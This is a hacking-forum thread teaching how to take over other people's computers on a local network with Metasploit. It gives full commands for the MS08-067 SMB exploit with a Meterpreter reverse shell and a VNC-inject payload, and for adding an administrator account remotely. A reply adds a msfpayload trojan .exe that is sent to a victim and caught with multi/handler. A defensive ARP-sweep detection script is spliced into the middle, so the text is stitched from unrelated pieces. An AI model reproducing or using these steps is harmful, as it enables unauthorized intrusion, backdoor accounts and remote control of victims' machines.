MaDLeeTs • Cyber Security & Professional Webmasters Forum

Full Version: Metasploit Hacking in LAN
Salam Guyz,

Today i'll show y0uh how to use Metasploit(Msfconsole)
to hack someone in y0ur LAN(Local Area Network)

things y0u'll need
1) Backtrack
2) Metasploit
3) users in LAN

so tym t0 play the Game! Xd

1st get y0ur ip by typing ifconfig in backtrack terminal and get y0ur internal ip
192.168.x.x
n0w 0n y0ur bt and open terminal and type
netdiscover -r 192.168.1.0/24
-r means Range
let it scan the network
after scanning y0u can pick any ip for hacking ;) :P

N0w G0to
Application => Exploitation Tools=>Network Exploitation => metasploit => msfconsole
or y0u can simply type in terminal => msfconsole
after msfconsole loaded type
set lhost 192.168.x.x (your internal ip)
LHOST => your internal ip will appear

then
set rhost (victim's ip address y0u g0t from scanning)
RHOST => 192.168.x.x (victim's internal ip)

N0w Choosing V.i.P Exploit and PayloaD

Exploit= netapi And PayloaD= meterpreter reverse TCP BEST!!!

type

use exploit/windows/smb/ms08_067_netapi
exploit => ms_08_067_netapi

then type

set payload windows/meterpreter/reverse_tcp
PAYLOAD => Meterpreter

now just type exploit
exploit

and it will start exploiting :P
you can get remote desktop by changing payload ..
set payload windows/vncinject/reverse_tcp

Y0u Can als0 add an administrator Remotely!

meterpreter>run getgui -u username -p password
-u is username And -p is password :P

HaPpY Exploiting in Y0ur LAN =P

Note:- For Educational Purpose Only !!
it Will Only W0rk if y0ur victim's machine is On and Working !
./kidcosec.net
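From the defender's side, the netdiscover sweep described in the post above is easy to spot on the wire: one host asks "who-has" for address after address within a second or two. The following script is an added example, not part of the forum post; it parses tcpdump-style ARP lines from a constructed sample (not captured traffic) and flags any sender that requested many distinct addresses inside a short window. The line layout, the 10-second window and the threshold of 8 are assumptions to tune for your own network.

```python
import re
from collections import defaultdict

# Constructed tcpdump-style ARP sample (not from the forum post): one host
# asking "who-has" for consecutive addresses, the footprint that
# netdiscover -r 192.168.1.0/24 leaves on the wire, plus normal background ARP.
SAMPLE_ARP_LOG = """\
10:00:00.10 ARP, Request who-has 192.168.1.1 tell 192.168.1.77
10:00:00.12 ARP, Request who-has 192.168.1.2 tell 192.168.1.77
10:00:00.14 ARP, Request who-has 192.168.1.3 tell 192.168.1.77
10:00:00.16 ARP, Request who-has 192.168.1.4 tell 192.168.1.77
10:00:00.18 ARP, Request who-has 192.168.1.5 tell 192.168.1.77
10:00:00.20 ARP, Request who-has 192.168.1.6 tell 192.168.1.77
10:00:00.22 ARP, Request who-has 192.168.1.7 tell 192.168.1.77
10:00:00.24 ARP, Request who-has 192.168.1.8 tell 192.168.1.77
10:00:01.00 ARP, Request who-has 192.168.1.1 tell 192.168.1.20
10:00:03.50 ARP, Request who-has 192.168.1.20 tell 192.168.1.1
10:00:09.00 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55
"""

# Assumed line layout: "HH:MM:SS.ff ARP, Request who-has <target> tell <sender>"
ARP_REQ = re.compile(r"^(\d+):(\d+):(\d+\.\d+) ARP, Request who-has (\S+) tell (\S+)$")

def parse_requests(text):
    """Yield (seconds_since_midnight, target_ip, sender_ip) per ARP request."""
    for line in text.splitlines():
        m = ARP_REQ.match(line)
        if not m:
            continue  # replies and non-ARP lines are ignored
        h, mnt, s, target, sender = m.groups()
        yield int(h) * 3600 + int(mnt) * 60 + float(s), target, sender

def find_arp_sweeps(text, window=10.0, threshold=8):
    """Return {sender: distinct_targets} for every sender that asked who-has
    for at least `threshold` distinct addresses within any `window` seconds."""
    by_sender = defaultdict(list)
    for ts, target, sender in parse_requests(text):
        by_sender[sender].append((ts, target))
    sweeps = {}
    for sender, reqs in by_sender.items():
        reqs.sort()  # sliding window over the sender's own requests
        for i, (start, _) in enumerate(reqs):
            targets = {t for ts, t in reqs[i:] if ts - start <= window}
            if len(targets) >= threshold:
                sweeps[sender] = len(targets)
                break
    return sweeps

if __name__ == "__main__":
    print(find_arp_sweeps(SAMPLE_ARP_LOG))  # {'192.168.1.77': 8}
```

On a real segment, feed it the output of `tcpdump -l -n arp` and raise the threshold above the number of hosts a normal client resolves in ten seconds.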
This is not as easy as it looks. This exploit works on open port 445 and it's only for Windows XP. And yep, one more thing: you have to make sure that port 445 is open on the victim PC and the victim is on XP; then it works perfectly. But when the victim is on Windows 7 you can't attack the victim, even if port 445 is open, so you also need to generate a .exe payload and send it to the victim for this exploit (there are other methods that don't include file sending, i.e. using applet attacks (browser autopwn)). To generate a .exe payload, open up a terminal and type the following command
Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 X > /root/Desktop/madleets.exe

a file named madleets.exe will be generated on your desktop
now send the file to the victim, open a terminal and start Metasploit,
and in msfconsole type the following command

Code:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
set lport 4444
exploit
this will listen for incoming sessions,
and when someone clicks on madleets.exe
you will see a meterpreter session opening up
(01-07-2013, 02:19 AM)madcodE Wrote:

I am in a situation where I can't send a file to someone who is on Windows. Is there another way which might help me?